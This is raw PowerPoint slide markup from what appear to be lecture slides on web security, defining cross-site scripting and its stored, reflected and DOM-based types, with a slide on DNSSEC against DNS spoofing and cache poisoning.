          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="16933">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr b="1" spc="-7" dirty="0"/>
              <a:t>What</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-27" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-7" dirty="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-20" dirty="0"/>
              <a:t>Cross-site</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-7" dirty="0"/>
              <a:t>Scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" spc="-20" dirty="0"/>
              <a:t>(XSS)?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="object 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="714587" y="1609684"/>
            <a:ext cx="10394527" cy="1495281"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="17780" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="473275" marR="6773" indent="-457189" algn="just">
              <a:spcBef>
                <a:spcPts val="140"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Vulnerability </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web application that </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>enables </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-47" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attackers </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>inject client-side scripts </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>into </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>web </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-947" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>pages</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>viewed</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-13" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-7" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>other </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3200" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>users.</a:t>
            </a:r>
            <a:endParaRPr sz="3200" dirty="0">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A66B12FE-B17B-0508-97AB-5FF3FA4A8EC6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3285734" y="3017921"/>
            <a:ext cx="6678397" cy="384007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917A-2E8E-D164-556D-D02D4960A9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Cross-site Scripting (XSS)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CF97A-CEE7-F012-95E3-E35F2103CFF1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="519652" y="1797343"/>
            <a:ext cx="11584364" cy="4377214"/>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Types of XSS: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Persistent/Stored XSS:</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Malicious scripts are permanently stored on the target server (e.g., in a database or message board).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>An attacker posts a script in a blog comment, which runs every time users visit the page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:highlight>
                <a:srgbClr val="FFFF00"/>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Reflected XSS:</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Malicious scripts are reflected off the server and executed in the user's browser, typically via a URL.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A user clicks on a malicious link containing JavaScript, and the browser executes it when the page loads.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1"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i="0" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Document Object Model</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DOM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" i="0" dirty="0">
                <a:effectLst/>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-Based XSS:</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Vulnerability occurs in client-side code where JavaScript processes untrusted input without proper validation.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Example: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>A script dynamically updates the DOM with attacker-controlled data.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="281797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b="1" dirty="0"/>
              <a:t>DNSSEC (DNS Security Extensions)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Times New Roman" pitchFamily="18" charset="0"/>
              <a:cs typeface="Times New Roman" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66563" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="575035" y="1219199"/>
            <a:ext cx="11048214" cy="436146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PK" altLang="en-PK" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Adds security features to DNS to </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ensure </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>data integrity and authenticity.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="0" fontAlgn="base" hangingPunct="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Mitigates issues like </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="1" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>DNS spoofing and cache poisoning</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:highlight>
                  <a:srgbClr val="FFFF00"/>
                </a:highlight>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, where attackers provide false DNS responses</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-PK" altLang="en-PK" sz="2400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>. </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62466" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3" cstate="print"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2975386" y="3570239"/>
            <a:ext cx="7085310" cy="2516958"/>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
            <a:ext cx="10248053" cy="6130803"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="541867" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="509681" algn="ctr">
              <a:spcBef>
                <a:spcPts val="4267"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Three</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-60" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Types</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-33" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-20" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="5867" spc="-27" dirty="0">
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:endParaRPr sz="5867">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="474121" indent="-457189">
              <a:spcBef>
                <a:spcPts val="3007"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="473275" algn="l"/>
                <a:tab pos="474121" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>2:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Persistent</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Stored</a:t>
            </a:r>
            <a:endParaRPr sz="4267">
              <a:latin typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1008355" lvl="1" indent="-382684">
              <a:spcBef>
                <a:spcPts val="920"/>
              </a:spcBef>
              <a:buFont typeface="Arial MT"/>
              <a:buChar char="–"/>
              <a:tabLst>
                <a:tab pos="1009201" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="60" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>stored</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="33" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>at</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" b="1" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="5EC422"/>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solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Type</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>1:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="4267" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> Reflected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C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>The</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>value</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="7" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-13" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="27" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="-20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>‘reflected’</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="3733" spc="20" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C0C0C0"/>
                </a:solidFill>
